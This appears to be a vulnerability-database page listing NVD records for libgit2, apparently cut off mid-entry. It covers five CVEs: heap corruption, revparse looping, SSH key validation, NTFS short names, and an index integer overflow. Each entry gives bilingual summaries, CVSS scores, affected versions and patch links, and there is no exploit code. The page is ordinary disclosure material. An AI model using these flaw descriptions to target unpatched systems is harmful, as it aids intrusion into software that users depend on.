Vulnerabilites related to libgit2 - libgit2
Vulnerability from fkie_nvd
Published
2024-02-06 22:16
Modified
2024-11-21 08:59
Severity ?
8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2.
References
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "AB8F928B-1059-4B60-877B-AAECE739B575", versionEndExcluding: "1.6.5", vulnerable: true, }, { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "E036286C-1FDD-47D7-89BA-5A436B2E72DF", versionEndExcluding: "1.7.2", versionStartIncluding: "1.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2.", }, { lang: "es", value: "libgit2 es una implementación C portátil de los métodos principales de Git proporcionada como una librería vinculable con una API sólida, que permite incorporar la funcionalidad de Git en su aplicación. El uso de entradas bien manipuladas para `git_index_add` puede provocar daños en el almacenamiento dinámico que podrían aprovecharse para la ejecución de código arbitrario. Hay un problema en la función `has_dir_name` en `src/libgit2/index.c`, que libera una entrada que no debería liberarse. La entrada liberada se utiliza posteriormente y se sobrescribe con datos controlados por actores potencialmente malos, lo que conduce a una corrupción controlada de almacenamiento dinámico. Dependiendo de la aplicación que utilice libgit2, esto podría provocar la ejecución de código arbitrario. Este problema se solucionó en las versiones 1.6.5 y 1.7.2.", }, ], id: "CVE-2024-24577", lastModified: "2024-11-21T08:59:27.603", metrics: { cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 8.6, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 4.7, source: "security-advisories@github.com", type: "Secondary", }, { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2024-02-06T22:16:15.270", references: [ { source: "security-advisories@github.com", tags: [ "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", }, { source: "security-advisories@github.com", tags: [ "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8", }, { source: "security-advisories@github.com", url: "https://lists.debian.org/debian-lts-announce/2024/02/msg00012.html", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.debian.org/debian-lts-announce/2024/02/msg00012.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/", }, ], sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-122", }, ], source: "security-advisories@github.com", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-119", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2020-04-27 17:15
Modified
2024-11-21 04:59
Severity ?
Summary
An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1353.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| libgit2 | libgit2 | * | |
| debian | debian_linux | 9.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "FE4A6653-6AAA-4AE1-A3BB-7EDD3BB80EAD", versionEndExcluding: "0.28.4", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1353.", }, { lang: "es", value: "Se descubrió un problema en libgit2 versiones anteriores a 0.28.4 y versiones 0.9x anteriores a 0.99.0. El archivo checkout.c maneja inapropiadamente los nombres de archivo equivalentes que existen debido a los nombres cortos de NTFS. Esto puede permitir una ejecución de código remota al clonar un repositorio. Este problema es similar a CVE-2019-1353.", }, ], id: "CVE-2020-12279", lastModified: "2024-11-21T04:59:26.230", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2020-04-27T17:15:13.470", references: [ { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/git/git/security/advisories/GHSA-589j-mmg9-733v", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/64c612cc3e25eff5fb02c59ef5a66ba7a14751e4", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.28.4", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.99.0", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "cve@mitre.org", url: "https://lists.debian.org/debian-lts-announce/2023/02/msg00034.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/git/git/security/advisories/GHSA-589j-mmg9-733v", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/64c612cc3e25eff5fb02c59ef5a66ba7a14751e4", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.28.4", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v0.99.0", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.debian.org/debian-lts-announce/2023/02/msg00034.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-706", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2018-03-14 00:29
Modified
2024-11-21 04:13
Severity ?
Summary
Integer overflow in the index.c:read_entry() function while decompressing a compressed prefix length in libgit2 before v0.26.2 allows an attacker to cause a denial of service (out-of-bounds read) via a crafted repository index file.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://github.com/libgit2/libgit2/commit/3207ddb0103543da8ad2139ec6539f590f9900c1 | Patch, Third Party Advisory | |
| cve@mitre.org | https://github.com/libgit2/libgit2/commit/3db1af1f370295ad5355b8f64b865a2a357bcac0 | Patch, Third Party Advisory | |
| cve@mitre.org | https://libgit2.github.com/security/ | Patch, Third Party Advisory | |
| cve@mitre.org | https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/libgit2/libgit2/commit/3207ddb0103543da8ad2139ec6539f590f9900c1 | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/libgit2/libgit2/commit/3db1af1f370295ad5355b8f64b865a2a357bcac0 | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://libgit2.github.com/security/ | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html | Mailing List, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| libgit2 | libgit2 | * | |
| debian | debian_linux | 9.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "1B57F6BF-68C5-4FB6-940E-022FD722FF41", versionEndExcluding: "0.26.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Integer overflow in the index.c:read_entry() function while decompressing a compressed prefix length in libgit2 before v0.26.2 allows an attacker to cause a denial of service (out-of-bounds read) via a crafted repository index file.", }, { lang: "es", value: "Desbordamiento de enteros en la función index.c:read_entry() mientras se descomprime una longitud de prefijo comprimida en libgit2, en versiones anteriores a la v0.26.2, permite que un atacante provoque una denegación de servicio (lectura fuera de límites) mediante un archivo de índice de repositorios manipulado.", }, ], id: "CVE-2018-8098", lastModified: "2024-11-21T04:13:15.313", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:M/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-03-14T00:29:00.593", references: [ { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/3207ddb0103543da8ad2139ec6539f590f9900c1", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/3db1af1f370295ad5355b8f64b865a2a357bcac0", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://libgit2.github.com/security/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/3207ddb0103543da8ad2139ec6539f590f9900c1", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/3db1af1f370295ad5355b8f64b865a2a357bcac0", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://libgit2.github.com/security/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2022/03/msg00031.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-190", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2024-02-06 22:16
Modified
2024-11-21 08:59
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2.
References
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "D0B8863D-BE78-48DD-8B29-20548D8D8EB2", versionEndExcluding: "1.6.5", versionStartIncluding: "1.4.0", vulnerable: true, }, { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "E036286C-1FDD-47D7-89BA-5A436B2E72DF", versionEndExcluding: "1.7.2", versionStartIncluding: "1.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2.", }, { lang: "es", value: "libgit2 es una implementación C portátil de los métodos principales de Git proporcionada como una librería vinculable con una API sólida, que permite incorporar la funcionalidad de Git en su aplicación. El uso de entradas bien manipuladas para `git_revparse_single` puede hacer que la función entre en un bucle infinito, lo que podría provocar un ataque de denegación de servicio en la aplicación que realiza la llamada. La función revparse en `src/libgit2/revparse.c` usa un bucle para analizar la cadena de especificaciones proporcionada por el usuario. Hay un caso límite durante el análisis que permite a un mal actor forzar las condiciones del bucle para acceder a la memoria arbitraria. Potencialmente, esto también podría perder memoria si la especificación de rev extraída se refleja al atacante. Como tal, las versiones de libgit2 anteriores a 1.4.0 no se ven afectadas. Los usuarios deben actualizar a la versión 1.6.5 o 1.7.2.", }, ], id: "CVE-2024-24575", lastModified: "2024-11-21T08:59:27.280", metrics: { cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "security-advisories@github.com", type: "Secondary", }, { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2024-02-06T22:16:15.057", references: [ { source: "security-advisories@github.com", tags: [ "Patch", ], url: "https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa", }, { source: "security-advisories@github.com", tags: [ "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", }, { source: "security-advisories@github.com", tags: [ "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.6.5", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.7.2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/", }, ], sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-400", }, ], source: "security-advisories@github.com", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-400", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2023-01-20 23:15
Modified
2024-11-21 07:45
Severity ?
5.3 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N
5.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
5.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
Summary
libgit2 is a cross-platform, linkable library implementation of Git. When using an SSH remote with the optional libssh2 backend, libgit2 does not perform certificate checking by default. Prior versions of libgit2 require the caller to set the `certificate_check` field of libgit2's `git_remote_callbacks` structure - if a certificate check callback is not set, libgit2 does not perform any certificate checking. This means that by default - without configuring a certificate check callback, clients will not perform validation on the server SSH keys and may be subject to a man-in-the-middle attack. Users are encouraged to upgrade to v1.4.5 or v1.5.1. Users unable to upgrade should ensure that all relevant certificates are manually checked.
References
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "211986E1-A66C-4735-8B6B-668FC843933C", versionEndExcluding: "1.4.5", vulnerable: true, }, { criteria: "cpe:2.3:a:libgit2:libgit2:1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "B2042615-3246-4D57-9182-2FAFE3397667", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "libgit2 is a cross-platform, linkable library implementation of Git. When using an SSH remote with the optional libssh2 backend, libgit2 does not perform certificate checking by default. Prior versions of libgit2 require the caller to set the `certificate_check` field of libgit2's `git_remote_callbacks` structure - if a certificate check callback is not set, libgit2 does not perform any certificate checking. This means that by default - without configuring a certificate check callback, clients will not perform validation on the server SSH keys and may be subject to a man-in-the-middle attack. Users are encouraged to upgrade to v1.4.5 or v1.5.1. Users unable to upgrade should ensure that all relevant certificates are manually checked.", }, { lang: "es", value: "libgit2 es una implementación de librería vinculable y multiplataforma de Git. Cuando se utiliza un control remoto SSH con el backend libssh2 opcional, libgit2 no realiza la verificación de certificados de forma predeterminada. Las versiones anteriores de libgit2 requieren que la persona que llama establezca el campo `certificate_check` de la estructura `git_remote_callbacks` de libgit2; si no se establece una devolución de llamada de verificación de certificado, libgit2 no realiza ninguna verificación de certificado. Esto significa que, de forma predeterminada, sin configurar una devolución de llamada de verificación de certificado, los clientes no realizarán la validación de las claves SSH del servidor y pueden estar sujetos a un ataque de intermediario. Se anima a los usuarios a actualizar a v1.4.5 o v1.5.1. Los usuarios que no puedan actualizar deben asegurarse de que todos los certificados relevantes se verifiquen manualmente.", }, ], id: "CVE-2023-22742", lastModified: "2024-11-21T07:45:20.250", metrics: { cvssMetricV31: [ { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", version: "3.1", }, exploitabilityScore: 1.6, impactScore: 3.6, source: "security-advisories@github.com", type: "Secondary", }, { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, exploitabilityScore: 2.2, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2023-01-20T23:15:10.307", references: [ { source: "security-advisories@github.com", url: "http://www.openwall.com/lists/oss-security/2023/11/06/5", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/42e5db98b963ae503229c63e44e06e439df50e56", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/cd6f679af401eda1f172402006ef8265f8bd58ea", }, { source: "security-advisories@github.com", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.4.5", }, { source: "security-advisories@github.com", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.5.1", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/security/advisories/GHSA-8643-3wh5-rmjq", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.libssh2.org", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.openwall.com/lists/oss-security/2023/11/06/5", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/42e5db98b963ae503229c63e44e06e439df50e56", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/cd6f679af401eda1f172402006ef8265f8bd58ea", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.4.5", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/releases/tag/v1.5.1", }, { source: 